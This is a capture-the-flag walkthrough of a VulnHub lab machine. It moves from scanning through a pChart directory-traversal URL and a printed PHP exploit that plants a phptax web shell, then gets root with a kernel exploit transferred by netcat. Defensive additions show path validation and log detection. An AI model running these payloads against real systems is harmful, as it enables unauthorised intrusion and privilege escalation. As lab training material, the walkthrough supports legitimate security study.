The machine

This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. It is the next one on the list and can be downloaded from vulnhub.

The challenge

The challenge or goal of the machine lists the following:

Get root

Walk-through

The walk-through is divided into a couple of sections following the standard penetration testing process: Information gathering -> Exploitation -> Post exploitation. It could be divided into more steps, but for simplicity we stick to these three.

Information gathering

To start off we will find the IP address of the machine with nmap, since netdiscover takes a while on my VMware. We will use the command sudo nmap -sn 192.168.0.0/24 for this. The vulnerable machine has the IP 192.168.0.135.

So to start off we scan the machine for open ports with nmap. We will do two scans: sudo nmap -sV -sC 192.168.0.135 -oA nmap and sudo nmap -sV -sC -p- 192.168.0.135 -oA fullnmap. We use these parameters for:
-sV service and version detection,
-sC basic (default) script scanning,
-p- a full port scan,
-oA saving all output to a couple of different file formats.

The nmap results are:

So we have port 22 (ssh), which is closed, and ports 80 and 8080 both running a web server. Let's have a manual look in our browser to see whether these are the same or different websites. Port 80 says IT WORKS! and port 8080 gives us a forbidden message.

Seems like we need to find some other directories on this website. Let's use Nikto for vulnerability scanning and dirb for directory brute forcing. We will use nikto -host http://192.168.0.135 -output nikto.txt and dirb http://192.168.0.135 -o dirb.txt. No special parameters, just the default lists, and we save the output to a file so we can review the results later if needed. Next to it we run the same commands against the address http://192.168.0.135:8080 so we cover port 8080 as well.

Results for port 80:

Results for port 8080:

/cgi/bin is not available on either port, since we get a forbidden error. We can not view this page. There aren't really any other directories. To be sure we will run another dirb with a bigger wordlist: dirb http://192.168.0.135 /usr/share/dirb/wordlists/big.txt. While this is running, let's have a look at the line that Nikto gave us: mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Exploitation

If we use searchsploit modssl to find a vulnerability, it lists a couple that might work: the OpenFuck exploits.

Let's copy the exploit code and view its contents: searchsploit -m exploits/unix/remote/21671.c. Then we can rename it to OpenFuck.c and compile it with gcc -o OpenFuck OpenFuck.c -lcrypto. Unfortunately this didn't work, since I needed to install libssl-dev. After apt-get install libssl-dev I reran the gcc command and got a lot more errors. I tried the first OpenFuckV2.c exploit and got the same errors; the second OpenFuckV2.c exploit (47080.c from searchsploit) worked. We could compile it!

Running the code with ./OpenFuck prints out its usage.

So let's go back to our nmap scan to see what OS and version it is. It should be FreeBSD with Apache 2.2.9? This isn't listed in the options the exploit offers for FreeBSD; they are all Apache 1.3.x. Let's try one, I guess. I tried a couple but it doesn't seem to be working for me. Nikto might have had it wrong.

Information Gathering

Back to information gathering: let's look at the source code of the website. Maybe there is a flag or a hint hidden in it.

If we go to http://192.168.0.135/pChart2.1.3/index.php we end up at http://192.168.0.135/pChart2.1.3/examples/index.php, which looks like some charting software, as the name implies.

Searchsploit tells us there are multiple vulnerabilities in pChart; they are all described in a file named 31173.txt. Let's copy this file and read it!

The first interesting vulnerability it lists is a directory traversal.

Exploitation

Let's copy the path traversal and paste it into our URL, so we get http://192.168.0.135/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd. And we see the contents of /etc/passwd.
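As an added example (not pChart's own code), here is the pattern behind that traversal, a Script parameter decoded once and joined onto the examples directory, next to a hardened version that only accepts a bare example file name and checks the resolved path stays under the directory. The install path and the .php extension are assumptions.

```python
import os
from urllib.parse import unquote

# Assumed install path of the example scripts (constructed for this example).
EXAMPLES_DIR = os.path.realpath("/var/www/pChart2.1.3/examples")

def vulnerable_resolve(script_param):
    """The weak pattern: decode once, join onto the base directory, serve."""
    # "%2f..%2f..%2fetc/passwd" decodes to "/../../etc/passwd"; because that is
    # an absolute path, os.path.join throws the base directory away entirely.
    return os.path.normpath(os.path.join(EXAMPLES_DIR, unquote(script_param)))

def safe_resolve(script_param):
    """Return the absolute path to serve, or None if the request is refused."""
    # Decode twice so a double-encoded separator (%252f) is also caught.
    value = unquote(unquote(script_param))
    # Only a bare example file name is legitimate: no separators, no dot
    # segments and only the example scripts' extension (assumed to be .php).
    if (not value or "/" in value or "\\" in value
            or value.startswith(".") or not value.endswith(".php")):
        return None
    candidate = os.path.realpath(os.path.join(EXAMPLES_DIR, value))
    # Second line of defence: the resolved path must stay under EXAMPLES_DIR.
    if os.path.commonpath([candidate, EXAMPLES_DIR]) != EXAMPLES_DIR:
        return None
    return candidate
```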

There are some users, but they all have nologin. No wonder ssh is closed, no need to log in on it :p. There is a toor and a root user, though. Might be interesting later. We need to find some more interesting files, like Apache configuration files. Let's google where to find them! I tried the following locations but could not find anything:

  • /etc/apache2/httpd.conf
  • /etc/apache2/apache2.conf
  • /etc/httpd/httpd.conf
  • /etc/httpd/conf/httpd.conf
  • /apache2.conf
  • /httpd.conf
  • /../apache2.conf
  • /../httpd.conf

Then I came across a link stating that the Apache config is under /usr/local/etc/apache2x/httpd.conf, where x is the version. We had Apache 2.2, so this should be apache22? http://192.168.0.135/pChart2.1.3/examples/index.php?Action=View&Script=/../../usr/local/etc/apache22/httpd.conf. Bingo! We got access to the Apache config. There is only one special thing about this configuration:

We need to set our user agent to Mozilla/4.0 Mozilla4_browser. We can do this with a browser add-on called User-Agent Switcher: set a custom user agent and go to the port 8080 web page.
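As an added example (not the configuration read from the target, whose screenshot is not reproduced here), this is the Apache 2.2 form of a User-Agent gate like the one the walkthrough had to satisfy on port 8080; the VirtualHost binding and DocumentRoot path are assumptions.

```apache
# Assumed layout; only the SetEnvIf/Allow lines carry the point.
<VirtualHost *:8080>
    DocumentRoot "/usr/local/www/apache22/data2"
    <Directory "/usr/local/www/apache22/data2">
        # Tag requests whose User-Agent header equals the expected string.
        SetEnvIf User-Agent "^Mozilla/4\.0 Mozilla4_browser$" Mozilla4_browser
        Order deny,allow
        Deny from all
        # Only tagged requests pass; everything else gets 403 Forbidden.
        Allow from env=Mozilla4_browser
    </Directory>
</VirtualHost>
```

The header is chosen by the client, so this hides the application from casual browsing but is not access control: anyone who learns the string, for example by reading the config through the traversal above, walks straight in. Authentication or network restrictions are what actually keep a second application private.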

We see a PHPTax application, from the USA? Never seen it before and it looks weird. But let's run searchsploit and google to see if there are any known vulnerabilities. There should be: searchsploit phptax

Let's copy the text file and read its contents. There is a Metasploit module, but I'd rather not use it. The txt file contains exploit code written in PHP. It shows us the following:

<?php

$options = getopt('u:');

if(!isset($options['u']))
    die("\n        Usage example: php exploit.php -u http://target.com/ \n");

$url   = $options['u'];
$shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";

$headers = array('User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
                 'Content-Type: text/plain');

echo "        [+] Submitting request to: {$options['u']}\n";

$handle = curl_init();

curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$source = curl_exec($handle);
curl_close($handle);

if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
    echo "        [+] Exploit completed successfully!\n";
    echo "        ______________________________________________\n\n        {$url}/data/rce.php?cmd=id\n";
}
else
{
    die("        [+] Exploit was unsuccessful.\n");
}

?>

After running the exploit we got an error, since we didn't have php-curl. I googled and we could install it with sudo apt-get install php-curl. So I ran the exploit code again and we got another error:

Maybe we have to change the browser agent, but wait… I don't think I pointed it at the /phptax/ directory. Fail! After fooling around and changing stuff here and there it still didn't work. So I checked the other exploit from exploitdb and still no luck. I started msfconsole and used exploit/multi/http/phptax_exec. I set the right options and it worked. We got a shell as www-data.
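From the defender's side, both the pChart traversal above and the phptax request pattern in the exploit code leave clear traces in the Apache access log. As an added example (not from the original post), the detection logic below URL-decodes every query parameter and flags a ".." path segment or a PHP open tag, run over constructed combined-format log lines that mirror the requests in this post.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote
# Constructed Apache combined-log lines mirroring the requests in this post.
SAMPLE_LOG = """\
192.168.0.129 - - [01/Jan/2020:10:00:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.0.129 - - [01/Jan/2020:10:00:02 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1470 "-" "Mozilla/5.0"
192.168.0.129 - - [01/Jan/2020:10:00:03 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=/../../usr/local/etc/apache22/httpd.conf HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
192.168.0.129 - - [01/Jan/2020:10:00:04 +0000] "GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1" 200 88 "-" "Mozilla/4.0 Mozilla4_browser"
192.168.0.129 - - [01/Jan/2020:10:00:05 +0000] "GET /phptax/data/rce.php?cmd=id HTTP/1.1" 200 60 "-" "Mozilla/4.0 Mozilla4_browser"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')   # a ".." path segment
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)  # PHP open tag in a value

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so %252f is seen as the "/" it becomes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(target):
    """Return the rule names one request target (path + query) triggers."""
    findings = []
    parts = urlsplit(target)
    if TRAVERSAL.search(decode_fully(parts.path)):
        findings.append("traversal-in-path")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_fully(value)
        if TRAVERSAL.search(value):
            findings.append("traversal-in-" + name)
        if PHP_TAG.search(value):
            findings.append("php-tag-in-" + name)
    return findings

def scan_log(log_text):
    """Return (ip, status, target, findings) for every line that triggers a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("status"), m.group("target"), findings))
    return hits
```

Note that the follow-up rce.php?cmd=id request matches neither rule: once the web shell exists, detection has to move to the dropped file or to the process tree under www-data.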

Privilege escalation

Now it's time for privilege escalation. There are no home directories, no processes running as root and no wget. But there is netcat. uname -mrs tells us it is running FreeBSD 9.0-RELEASE amd64. Let's try to find a kernel exploit, since I'm not able to find anything else with the privilege escalation guide.

Let's copy the first one with searchsploit -m 28718.c. We can not download it with wget, since there is none. We have to use nc. After some fooling around I found out that the 28718.c I was trying to transfer had overwritten itself with nothing, so I was trying to transfer an empty file and was confused about why the transferred file was empty. Epic fail!

Eventually I transferred the file with nc -lvp 3000 < 26368.c and nc 192.168.0.129 3000 > exploit2.c. You might be wondering: this is another exploit. Yes! The first one didn't work for me; when I ran it I got some core errors. So I tried the second one and this one worked! We compiled the second exploit with gcc -o exploit2 exploit2.c, ran it, and then we did id and we are root! The flag was in the /root/ directory!

Flag
